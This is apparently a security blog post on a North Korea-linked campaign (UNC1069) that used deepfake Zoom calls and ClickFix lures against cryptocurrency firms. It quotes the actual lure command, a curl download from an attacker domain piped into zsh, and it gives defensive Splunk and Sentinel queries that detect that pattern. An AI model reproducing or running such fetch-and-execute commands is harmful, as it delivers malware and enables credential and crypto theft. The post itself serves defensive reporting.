Structured data rendered for: WebPage
Back to Blog

North Korean Hackers Use Deepfake Video Calls to Target Crypto Firms

February 14, 2026
3 min read
North Korean Hackers Use Deepfake Video Calls to Target Crypto Firms

Executive Summary

Since February 2026, the North Korea–linked group UNC1069 has been observed running a highly targeted deepfake campaign against cryptocurrency and fintech organizations, combining compromised Telegram accounts, fake Zoom meetings, and ClickFix-style command lures to deliver multi‑stage malware to macOS and Windows systems. Mandiant assesses this activity as an economically motivated, North Korean nexus operation active since at least 2018, now aggressively targeting Web3, centralized exchanges (CEXs), crypto software developers, and venture capital firms.

In a single intrusion, analysts documented seven distinct malware families—including WAVESHAPER, HYPERCALL, and SUGARLOADER—deployed on one host, underscoring a determined effort to steal high‑value credentials and prepare future social engineering operations using stolen identities. This campaign demonstrates that video calls, chat apps, and calendar invites are now part of the critical attack surface, not just email.

The Flaw: AI-Driven Social Engineering & ClickFix Execution

UNC1069 utilizes a high-severity social engineering technique combined with malware delivery (ClickFix), effectively bypassing traditional perimeter controls.

How the Exploit Works (ClickFix)

  1. Account Takeover & Approach The attacker compromises a Telegram account of a real crypto executive to build rapport with new targets.
  2. Fake Zoom Meeting Targets are invited to a "due diligence" call on a fake meeting platform masquerading as Zoom (e.g., zoom.uswe05[.]us).
  3. Deepfake Interaction The victim sees a live Zoom call with a recognizable executive, likely a deepfake or replayed video to establish trust.
  4. ClickFix Command Lure Claiming an audio issue, the attacker instructs the victim to run a "fix" command to resolve the "glitch".
    # Malicious "fix" command hidden in benign diagnostics
    curl -A audio -s http://mylingocoin[.]com/audio/fix/6454694440 | zsh
    
  5. Malware Execution This command pulls and executes the first-stage payload from attacker infrastructure.

North Korean Hackers Use Deepfake Video Calls to Target Crypto Firms - image

Timeline: Evolution of the UNC1069 Deepfake Campaign

DateEventStatus
2018UNC1069 activity begins targeting crypto sector⚠️ Initial compromise
Feb 2026Deepfake campaign targeting Web3/Fintech identified🔴 Active exploitation
Feb 2026Multiple malware families (WAVESHAPER, etc.) deployed🔍 Continuing threat

State-Sponsored Exploitation

North Korea-Nexus Threat Actors

UNC1069 (North Korean Group)

  • Targeting: Cryptocurrency exchanges, Web3 developers, Venture Capital firms
  • Payload: Custom malware families including WAVESHAPER, HYPERCALL, HIDDENCALL, DEEPBREATH, CHROMEPUSH, SILENCELIFT, and SUGARLOADER.
  • TTPs: Deepfake video calls, Telegram impersonation, "ClickFix" social engineering.
  • Status: Active exploitation confirmed in 2026.

Financially Motivated Exploitation

ActorGeographyPayloadFocus
UNC1069North KoreaWAVESHAPER etc.Crypto theft / Initial Access

UNC1069 represents a convergence of state-sponsored capability with financial motivation, aggressively targeting the cryptocurrency ecosystem to fund regime activities.

Why This Matters: The Collapse of Video Verification Trust

Key Challenges

  1. AI-Generated Trust: Deepfakes erode the "see it to believe it" trust model, making verification difficult.
  2. Cross-Platform Targeting: Attacks move fluidly between Telegram, Calendly, and Zoom, bypassing email filters.
  3. Bypassing Technical Controls: Users are tricked into initiating commands, effectively authorizing the malware themselves.

Mitigation Guide: How to Detect & Block ClickFix Attacks

🔴 Block "ClickFix" Patterns (Critical Priority)

  • Bold the action: Configure EDR and shell monitoring to block curl or powershell piping directly to execution shells (| zsh, | sh, | bash, iex) when initiated from browser or chat applications.

👥 User Awareness

  • Train staff that legitimate audio fixes never require running terminal commands.
  • Verify identity via a secondary channel (e.g., call their mobile) if a meeting feels "off" or requests unusual actions.

🔍 Detection & Response

  • Monitor for traffic to known malicious domains (e.g., mylingocoin[.]com).
  • Hunt for the presence of the 7 identified malware families.

Splunk Example (Detecting Curl into Shell):

index=syslog process_exec="*curl*|*zsh*" OR process_exec="*curl*|*sh*"
| search parent_process="*Zoom*" OR parent_process="*Telegram*"
| stats count by host, user

Microsoft Sentinel Example:

DeviceProcessEvents
| where ProcessCommandLine contains "curl" and ProcessCommandLine contains "| zsh"
| where InitiatingProcessFileName in~ ("Telegram.exe", "Zoom.exe", "Slack.exe")
| project TimeGenerated, DeviceName, ProcessCommandLine, InitiatingProcessFileName

Bottom Line

Deepfakes and "ClickFix" lures have weaponized trusted communication channels, requiring a shift from relying solely on technical controls to robust human verification protocols.

Key Takeaways

Verify Identity - Use out-of-band verification for unexpected meeting invites or requests. ✅ Block Execution - Restrict the ability for standard users to pipe web content directly to shells.

For Your Clients and Users

Zero Trust for Video Calls. Assume video, voice, and chat can be spoofed. Never execute commands or install software to "fix" a meeting glitch.

Frequently Asked Questions

What is the UNC1069 Deepfake Campaign?

It is a sophisticated social engineering attack by North Korean actors using deepfake video calls and compromised accounts to trick crypto targets into running malware.

How does the "ClickFix" exploit work?

Attackers claim there is an audio issue during a fake meeting and persuade the victim to copy-paste a malicious script (often starting with curl or powershell) into their terminal to "fix" it.

Who is targeted by UNC1069?

The primary targets are cryptocurrency exchanges, Web3 companies, fintech organizations, and venture capital firms holding digital assets.

REFERENCES

  1. North Korean Hackers Use Deepfake Video Calls to Target Crypto Firms – Infosecurity Magazine, February 10, 2026.
    https://www.infosecurity-magazine.com/news/north-korea-hackers-deepfake-crypto/

  2. UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering – Google Cloud / Mandiant, February 8, 2026.
    https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering

  3. North Korea-Linked UNC1069 Uses AI Lures to Attack Cryptocurrency Sector – The Hacker News, February 10, 2026.
    https://thehackernews.com/2026/02/north-korea-linked-unc1069-uses-ai.html

  4. North Korean Hackers Targeted Crypto Exec with Fake Zoom Meeting and ClickFix – The Record, February 10, 2026.
    https://therecord.media/north-korean-hackers-targeted-crypto-exec-clickfix

  5. Armed with New Tools, North Koreans Ramp Up Attacks on Lucrative Crypto Industry – CyberNews, February 10, 2026.
    https://cybernews.com/security/north-korea-ai-lucrative-crypto-industry/

  6. North Korea's Bluenoroff Uses Deepfakes in Zoom Calls to Hack Crypto Workers – Diplo, June 19, 2025.
    https://dig.watch/updates/north-koreas-bluenoroff-uses-deepfakes-in-zoom-calls-to-hack-crypto-workers

  7. North Korean Hackers Deploy 'ClickFix' Tactic to Steal from Crypto Firms – WebProNews, September 20, 2025.
    https://www.webpronews.com/north-korean-hackers-deploy-clickfix-tactic-to-steal-from-crypto-firms/

  8. North Korean Hackers Target Crypto and Retail Sectors with ClickFix Malware Campaign – SSBCrack News, September 20, 2025.
    https://news.ssbcrack.com/north-korean-hackers-target-crypto-and-retail-sectors-with-clickfix-malware-campaign/

  9. North Korean Cryptocurrency Thieves Caught Hijacking Zoom Remote Control Feature – SecurityWeek, April 20, 2025.
    https://www.securityweek.com/north-korean-cryptocurrency-thieves-caught-hijacking-zoom-remote-control-feature/

  10. North Korean Hackers Try to Steal Crypto via Deepfake Zoom Call – TechRepublic, June 23, 2025.
    https://www.techrepublic.com/article/news-north-korea-deepfake-zoom-crypto-attack/

Written by

Lucas Oliveira

Research

A DevOps engineer and cybersecurity enthusiast with a passion for uncovering the latest in zero-day exploits, automation, and emerging tech. I write to share real-world insights from the trenches of IT and security, aiming to make complex topics more accessible and actionable. Whether I’m building tools, tracking threat actors, or experimenting with AI workflows, I’m always exploring new ways to stay one step ahead in today’s fast-moving digital landscape.